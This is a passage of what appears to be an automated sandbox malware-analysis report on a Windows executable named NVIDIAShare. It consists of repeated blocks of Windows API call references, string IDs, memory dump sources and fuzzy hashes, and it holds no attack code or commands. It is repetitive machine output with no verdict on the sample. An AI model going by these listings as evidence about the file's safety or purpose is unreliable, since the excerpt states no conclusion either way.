                                                              • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                              • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
                                                            • Instruction ID: 6f04a2c1c482d9154cff54d49baf06ef2644776e36e69643ee98bc2ddebb20c5
                                                            • Opcode Fuzzy Hash: 2b78e14c86bcfce8256ce7ae79a54d657d33c495778037f924c0f34688ae90e7
                                                            • Instruction Fuzzy Hash: 5731D671E00259AAFF63EBA8CC44BEE7BA9BF55300F044055E5C5AB1C1CBB9A984C761
                                                            APIs
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • EndDialog.USER32(?,00000001), ref: 0101AD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101ADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0101ADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
                                                            • Instruction ID: 94bc755e958b0fdd24a033ed09095d4b0464aa2dc4a6026eed6cd84fb23f48e5
                                                            • Opcode Fuzzy Hash: a9525abd271ca87f4d914b22a003b4b4bc751f2406a0cd9fce8c509dc002820c
                                                            • Instruction Fuzzy Hash: 5011B132345641FFE262AF6CDC45FAA7BA9EB4A752F800044F2C2DB0ACC77B94059721
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 0100D954
                                                            • _strncpy.LIBCMT ref: 0100D99A
                                                              • Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
                                                            • Instruction ID: 31def597853391b9143afd0f81739381f4809b5670d312a1ccd3346a033f7f1a
                                                            • Opcode Fuzzy Hash: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
                                                            • Instruction Fuzzy Hash: 3321D532800648AEFB22EEE8CC41FDE3BE9BF01300F040516FA909A1D1E332D249CB61
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 01010EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
                                                            • Instruction ID: da2b9517c12fdba17235caf7bda789cfad4f18e756de8c845cd89ed6d4cb695c
                                                            • Opcode Fuzzy Hash: 7f34a4e5cfc6d33f48118ab8da79ed0509bfe8c3620a1aaf27b64783884c3925
                                                            • Instruction Fuzzy Hash: 251151B16407099FD3314F6B98849A7FBECFB65754F14482EF1DAC6204D6B659808B50
                                                            APIs
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • EndDialog.USER32(?,00000001), ref: 0101B2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101B2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0101B304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
                                                            • Instruction ID: 90168126a2390076cb5a9fa0461ac914f159448eabecc3f165c506425d23e3c1
                                                            • Opcode Fuzzy Hash: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
                                                            • Instruction Fuzzy Hash: E0110832900115B7EB629A689D49FFF7BBCFF59700F004050FAC5F60C8C7A9A91987A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
                                                            • Instruction ID: a9b5f280b4583966a2c437509cd04fa4607b2dc3464208648edfb99c05be1b8c
                                                            • Opcode Fuzzy Hash: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
                                                            • Instruction Fuzzy Hash: 6301F5B9604244AFD730AED8FD8899A7FA8F748340B00482AF5C5C3228C73ED850DBA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction ID: cf92f794dcef4a994ff41bcbf41fdddc51641b6d8b2ae45c24af45c74368076a
                                                            • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction Fuzzy Hash: 5BA129729043BA9FEB26CF18C8917AEBFE5EF55318F2841ADD9C59B281C2398941C750
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,01007F69,?,?,?), ref: 0100A3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,01007F69,?), ref: 0100A43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,01007F69,?,?,?,?,?,?,?), ref: 0100A4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,01007F69,?,?,?,?,?,?,?,?,?,?), ref: 0100A4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
                                                            • Instruction ID: 020702c7db62fd5d77cef9a6f518e718593e5a6ad10676109ccb3f7a767d3cb5
                                                            • Opcode Fuzzy Hash: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
                                                            • Instruction Fuzzy Hash: E841AF312483819AF732DE28DC55FEFBBE8AB85700F04495DB6D1D71C0DAB89A48DB52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
                                                            • Instruction ID: eec721f06f1dd6a54d9e524834f1e9bb5871a12db14cbfb8629f86163a5f8cbc
                                                            • Opcode Fuzzy Hash: cce129f31006e27da8112d56d0a1eda3a571ded943039947c7734ebb97adca33
                                                            • Instruction Fuzzy Hash: 5D41B7719006669BDB219F688C559DE7BB8EF14310F000059F9C9F7289DB34ED598BE0
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010291E0,?,00000000,?,00000001,?,?,00000001,010291E0,?), ref: 0102C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01026CBE,?), ref: 0102CA70
                                                            • __freea.LIBCMT ref: 0102CA79
                                                              • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
                                                            • Instruction ID: ed2d6f2d6174f20c8c28b3809acced4443dd2bf137096f88a7eb9ee66b5ae090
                                                            • Opcode Fuzzy Hash: 56d0f153d39c0cb905f29f7f6a6b761015d4236384a408c17edb643204b09080
                                                            • Instruction Fuzzy Hash: 5131C172A0022AABEF25CF68DC85DFE7BA5EF41714B0442A8EC84E7250E735DD54CB90
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0101A666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0101A675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101A683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0101A691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
                                                            • Instruction ID: 579ba39f9111fb4198bb62cc15749197ef82f3556b60e6f15499c4ba8277be48
                                                            • Opcode Fuzzy Hash: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
                                                            • Instruction Fuzzy Hash: A7E08C31A42720FBE2701BA0A91DB8B3E94BB05B52F004505FF899A188DB7E80088BE0
                                                            APIs
                                                              • Part of subcall function 0101A699: GetDC.USER32(00000000), ref: 0101A69D
                                                              • Part of subcall function 0101A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0101A6A8
                                                              • Part of subcall function 0101A699: ReleaseDC.USER32(00000000,00000000), ref: 0101A6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0101A83C
                                                              • Part of subcall function 0101AAC9: GetDC.USER32(00000000), ref: 0101AAD2
                                                              • Part of subcall function 0101AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0101AB01
                                                              • Part of subcall function 0101AAC9: ReleaseDC.USER32(00000000,?), ref: 0101AB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
                                                            • Instruction ID: dc3842d6006a8fa5fabe1f3ddbb26c5507f551926b0bdd9edbcccf53d03fea8b
                                                            • Opcode Fuzzy Hash: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
                                                            • Instruction Fuzzy Hash: A191F371604380EFD720DF25C884A2BBBE8FFC9611F00495EF99AD7225DB35A845CB62
                                                            APIs
                                                            • _free.LIBCMT ref: 0102B324
                                                              • Part of subcall function 01029097: IsProcessorFeaturePresent.KERNEL32(00000017,01029086,00000050,01033A34,?,0100D710,00000004,01041030,?,?,01029093,00000000,00000000,00000000,00000000,00000000), ref: 01029099
                                                              • Part of subcall function 01029097: GetCurrentProcess.KERNEL32(C0000417,01033A34,00000050,01041030), ref: 010290BB
                                                              • Part of subcall function 01029097: TerminateProcess.KERNEL32(00000000), ref: 010290C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction ID: 404f55a7778ee7622342f99f5da2bd885d2ed220bac62a7c44004ab7a9eb5aa1
                                                            • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction Fuzzy Hash: ED519471E0022A9FDF15DFA8C880AEDBBF5FF59314F2481A9D894E7341E6359A05CB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 010075E3
                                                              • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                              • Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100777F
                                                              • Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
                                                              • Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
                                                            • Instruction ID: b11a4c151c29fc10881f168db68412f4009bbab564832e87430acea193625797
                                                            • Opcode Fuzzy Hash: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
                                                            • Instruction Fuzzy Hash: 74417171900259A9FB36EB64CC58EEEB77CAF55300F0040D6A6CAA70D2DB785B85CB71
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
